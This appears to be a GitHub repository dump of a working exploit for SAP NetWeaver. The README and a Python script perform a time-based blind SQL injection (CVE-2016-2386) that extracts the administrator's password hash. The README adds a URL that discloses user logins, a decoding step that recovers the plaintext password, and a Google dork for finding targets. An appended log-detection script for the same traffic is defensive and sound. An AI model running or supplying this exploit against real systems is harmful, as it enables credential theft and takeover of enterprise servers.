├── Hardcore-SAP-Penetration-Testing.pdf
├── README.md
├── SQL_injection_CVE-2016-2386.py
└── img
    └── exploit.gif

/Hardcore-SAP-Penetration-Testing.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vah13/SAP_exploit/f12aa9cf69606c3c1cda066a4ece2e3b52b9029d/Hardcore-SAP-Penetration-Testing.pdf
--------------------------------------------------------------------------------

/README.md:
--------------------------------------------------------------------------------
# SAP_exploit
Author: Vahagn Vardanyan https://twitter.com/vah_13

Bugs:

CVE-2016-2386 SQL injection

CVE-2016-2388 Information disclosure

CVE-2016-1910 Crypto issue

The following HTTP request is a simple PoC for an anonymous time-based SQL injection (CVE-2016-2386) in SAP NetWeaver AS Java UDDI 7.11-7.50:

```
POST /UDDISecurityService/UDDISecurityImplBean HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
SOAPAction:
Content-Type: text/xml;charset=UTF-8
Host: nw74:50000
Content-Length: 500

1' AND 1=(select COUNT(*) from J2EE_CONFIGENTRY, UME_STRINGS where UME_STRINGS.PID like '%PRIVATE_DATASOURCE.un:Administrator%' and UME_STRINGS.VAL like '%SHA-512%') AND '1'='1
```

On my SAP test server I have an admin user whose login is "Administrator", so I used this payload:

%PRIVATE_DATASOURCE.un:Administrator%

Most SAP systems use the j2ee_admin username for the SAP administrator login:

%PRIVATE_DATASOURCE.un:j2ee_admin%

You can get the logins of all SAP users using these URLs (CVE-2016-2388, information disclosure):
```
1) http:/SAP_IP:SAP_PORT/webdynpro/resources/sap.com/tc~rtc~coll.appl.rtc~wd_chat/Chat#
2) http:/SAP_IP:SAP_PORT/webdynpro/resources/sap.com/tc~rtc~coll.appl.rtc~wd_chat/Messages#
```
Instead of the J2EE_CONFIGENTRY table you can use these tables:
```
UME_STRINGS_PERM
UME_STRINGS_ACTN
BC_DDDBDP
BC_COMPVERS
TC_WDRR_MRO_LUT
TC_WDRR_MRO_FILES
T_CHUNK !!! very big table; if the SAP server does not respond within 20 seconds, you have SQL injection
T_DOMAIN
T_SESSION
UME_ACL_SUP_PERM
UME_ACL_PERM
UME_ACL_PERM_MEM
```

An example of a working exploit:
```
C:\Python27\python.exe SQL_injection_CVE-2016-2386.py --host nw74 --port 50000
start to retrieve data from the table UMS_STRINGS from nw74 server using CVE-2016-2386 exploit
this may take a few minutes
Found {SHA-512, 10000, 24}M
Found {SHA-512, 10000, 24}MT
Found {SHA-512, 10000, 24}MTI
Found {SHA-512, 10000, 24}MTIz
Found {SHA-512, 10000, 24}MTIzU
Found {SHA-512, 10000, 24}MTIzUV
Found {SHA-512, 10000, 24}MTIzUVd
Found {SHA-512, 10000, 24}MTIzUVdF
Found {SHA-512, 10000, 24}MTIzUVdFY
Found {SHA-512, 10000, 24}MTIzUVdFYX
Found {SHA-512, 10000, 24}MTIzUVdFYXN
Found {SHA-512, 10000, 24}MTIzUVdFYXNk
Found {SHA-512, 10000, 24}MTIzUVdFYXNk8
Found {SHA-512, 10000, 24}MTIzUVdFYXNk88
Found {SHA-512, 10000, 24}MTIzUVdFYXNk88F
Found {SHA-512, 10000, 24}MTIzUVdFYXNk88Fx
Found {SHA-512, 10000, 24}MTIzUVdFYXNk88Fxu
Found {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuY
Found {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC
Found {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC6
Found {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC6X
```

And finally, using CVE-2016-1910 (crypto issue), you can get the administrator password in plain text:
```
base64_decode(MTIzUVdFYXNk88FxuYC6X)=123QWEasdóÁq¹€ºX
```

![CVE-2016-2386](https://github.com/vah13/SAP_exploit/blob/master/img/exploit.gif?raw=true)

[PDF whitepaper] https://erpscan.com/wp-content/uploads/2017/12/Hardcore-SAP-Penetration-Testing.pdf

[SAP-Google-Dork] inurl:/irj/portal
--------------------------------------------------------------------------------

/SQL_injection_CVE-2016-2386.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# coding=utf-8
"""
Author: Vahagn Vardanyan https://twitter.com/vah_13

Bugs:
CVE-2016-2386 SQL injection
CVE-2016-2388 Information disclosure
CVE-2016-1910 Crypto issue

The following HTTP request is a simple PoC for an anonymous time-based SQL injection (CVE-2016-2386) in SAP NetWeaver AS Java UDDI 7.11-7.50

POST /UDDISecurityService/UDDISecurityImplBean HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
SOAPAction:
Content-Type: text/xml;charset=UTF-8
Host: nw74:50000
Content-Length: 500

1' AND 1=(select COUNT(*) from J2EE_CONFIGENTRY, UME_STRINGS where UME_STRINGS.PID like '%PRIVATE_DATASOURCE.un:Administrator%' and UME_STRINGS.VAL like '%SHA-512%') AND '1'='1

On my SAP test server I have an admin user whose login is "Administrator", so I used this payload

%PRIVATE_DATASOURCE.un:Administrator%

Most SAP systems use the j2ee_admin username for the SAP administrator login

%PRIVATE_DATASOURCE.un:j2ee_admin%

You can get the logins of all SAP users using these URLs (CVE-2016-2388, information disclosure)

1) http:/SAP_IP:SAP_PORT/webdynpro/resources/sap.com/tc~rtc~coll.appl.rtc~wd_chat/Chat#
2) http:/SAP_IP:SAP_PORT/webdynpro/resources/sap.com/tc~rtc~coll.appl.rtc~wd_chat/Messages#

Instead of the J2EE_CONFIGENTRY table you can use these tables

UME_STRINGS_PERM
UME_STRINGS_ACTN
BC_DDDBDP
BC_COMPVERS
TC_WDRR_MRO_LUT
TC_WDRR_MRO_FILES
T_CHUNK !!! very big table; if the SAP server does not respond within 20 seconds, you have SQL injection
T_DOMAIN
T_SESSION
UME_ACL_SUP_PERM
UME_ACL_PERM
UME_ACL_PERM_MEM

An example of a working exploit

C:\Python27\python.exe SQL_injection_CVE-2016-2386.py --host nw74 --port 50000
start to retrieve data from the table UMS_STRINGS from nw74 server using CVE-2016-2386 exploit
this may take a few minutes
Found {SHA-512, 10000, 24}M
Found {SHA-512, 10000, 24}MT
Found {SHA-512, 10000, 24}MTI
Found {SHA-512, 10000, 24}MTIz
Found {SHA-512, 10000, 24}MTIzU
Found {SHA-512, 10000, 24}MTIzUV
Found {SHA-512, 10000, 24}MTIzUVd
Found {SHA-512, 10000, 24}MTIzUVdF
Found {SHA-512, 10000, 24}MTIzUVdFY
Found {SHA-512, 10000, 24}MTIzUVdFYX
Found {SHA-512, 10000, 24}MTIzUVdFYXN
Found {SHA-512, 10000, 24}MTIzUVdFYXNk
Found {SHA-512, 10000, 24}MTIzUVdFYXNk8
Found {SHA-512, 10000, 24}MTIzUVdFYXNk88
Found {SHA-512, 10000, 24}MTIzUVdFYXNk88F
Found {SHA-512, 10000, 24}MTIzUVdFYXNk88Fx
Found {SHA-512, 10000, 24}MTIzUVdFYXNk88Fxu
Found {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuY
Found {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC
Found {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC6
Found {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC6X

And finally, using CVE-2016-1910 (crypto issue), you can get the administrator password in plain text

base64_decode(MTIzUVdFYXNk88FxuYC6X)=123QWEasdóÁq¹€ºX

"""
import argparse
import requests
import string

_magic = "{SHA-512, 10000, 24}"
_wrong_magic = "{SHA-511, 10000, 24}"
# SOAP request body; {0} is replaced with the hash prefix being tested
_xml = "\r\n \r\n \r\n " \
       "\r\n 1' AND 1=(select COUNT(*) from J2EE_CONFIGENTRY, " \
       "UME_STRINGS where UME_STRINGS.PID like '%PRIVATE_DATASOURCE.un:Administrator%' and UME_STRINGS.VAL like '%{" \
       "0}%') AND '1'='1\r\n \r\n \r\n "
host = ""
port = 0
# Python 2: string.uppercase / string.lowercase
_dictionary = string.digits + string.uppercase + string.lowercase


def _get_timeout(_data):
    # Send one request and return how long the server took to answer (seconds)
    return requests.post("http://{0}:{1}/UDDISecurityService/UDDISecurityImplBean".format(host, port),
                         headers={
                             "User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 "
                                           "Firefox/57.0",
                             "SOAPAction": "",
                             "Content-Type": "text/xml;charset=UTF-8"
                         },
                         data=_xml.format(_data)).elapsed.total_seconds()


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument('--host')
    parser.add_argument('--port')
    parser.add_argument('-v', action='store_true')  # verbose: print every candidate

    args = parser.parse_args()
    args_dict = vars(args)

    host = args_dict['host']
    port = args_dict['port']

    print "start to retrieve data from the table UMS_STRINGS from {0} server using CVE-2016-2386 exploit ".format(host)
    _hash = _magic
    print "this may take a few minutes"
    for i in range(24):  # you can change it if you like to get the full hash
        for _char in _dictionary:
            if args_dict['v']:
                print "checking {0}".format(_hash + _char)
            if _get_timeout(_hash + _char) > 1.300:  # timeout for local SAP server
                _hash += _char
                print "Found " + _hash
                break
--------------------------------------------------------------------------------

/img/exploit.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vah13/SAP_exploit/f12aa9cf69606c3c1cda066a4ece2e3b52b9029d/img/exploit.gif
--------------------------------------------------------------------------------
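As an added example (not part of vah13's repository), the following Python 3 script shows how a defender would spot this PoC's traffic in web-server or reverse-proxy logs: it flags POSTs to the UDDI endpoint carrying the published payload markers, and bursts of such requests mixed with the slow responses a time-based oracle leaves behind. The pipe-separated log format and the sample lines are constructed for the example; the 1.3 s threshold is the PoC's own oracle timeout.

```python
# Added detection example (not part of vah13's repository): flag the request
# pattern of the CVE-2016-2386 PoC in web/proxy logs. Log format is constructed.
from collections import defaultdict

UDDI_PATH = "/UDDISecurityService/UDDISecurityImplBean"
SQLI_MARKERS = ("' and 1=(select count(*)", "ume_strings", "private_datasource", "sha-512")
SLOW_MS = 1300        # the PoC's own oracle threshold is 1.3 s
BURST_THRESHOLD = 10  # one PoC character costs up to 62 POSTs to this endpoint

def parse_line(line):
    # Constructed format: ts|src_ip|method|path|status|elapsed_ms|body
    parts = line.rstrip("\n").split("|", 6)
    if len(parts) != 7:
        return None
    ts, src, method, path, status, ms, body = parts
    return {"src": src, "method": method, "path": path, "ms": int(ms), "body": body}

def is_sqli_body(body):
    # Two or more markers from the published payload => treat as an injection attempt
    b = body.lower()
    return sum(m in b for m in SQLI_MARKERS) >= 2

def detect(lines):
    # Aggregate per source: POSTs to the UDDI endpoint, injection bodies, and slow
    # responses (the time-based oracle leaves one slow reply per matched character).
    per_src = defaultdict(lambda: {"hits": 0, "sqli": 0, "slow": 0})
    for rec in filter(None, map(parse_line, lines)):
        if rec["method"] != "POST" or rec["path"] != UDDI_PATH:
            continue
        s = per_src[rec["src"]]
        s["hits"] += 1
        s["sqli"] += is_sqli_body(rec["body"])
        s["slow"] += rec["ms"] >= SLOW_MS
    alerts = []
    for src, s in sorted(per_src.items()):
        reasons = (["sql-injection-payload"] if s["sqli"] else []) + \
                  (["time-based-oracle-burst"] if s["hits"] >= BURST_THRESHOLD and s["slow"] else [])
        if reasons:
            alerts.append({"src": src, "requests": s["hits"], "reasons": reasons})
    return alerts

# Constructed sample: 12 PoC requests (one slow) from 10.0.0.5, benign traffic from 10.0.0.9.
_PAYLOAD = ("1' AND 1=(select COUNT(*) from J2EE_CONFIGENTRY, UME_STRINGS where UME_STRINGS.PID "
            "like '%PRIVATE_DATASOURCE.un:j2ee_admin%' and UME_STRINGS.VAL like '%SHA-512%') AND '1'='1")
SAMPLE_LOG = ["2016-02-10T10:00:%02d|10.0.0.5|POST|%s|200|%d|%s"
              % (i, UDDI_PATH, 1450 if i == 7 else 40, _PAYLOAD) for i in range(12)]
SAMPLE_LOG += ["2016-02-10T10:01:00|10.0.0.9|POST|%s|200|35|name=acme" % UDDI_PATH,
               "2016-02-10T10:01:01|10.0.0.9|GET|/irj/portal|200|12|"]
```

Running `detect(SAMPLE_LOG)` yields a single alert for 10.0.0.5 with both reasons; the benign UDDI POST from 10.0.0.9 is not reported.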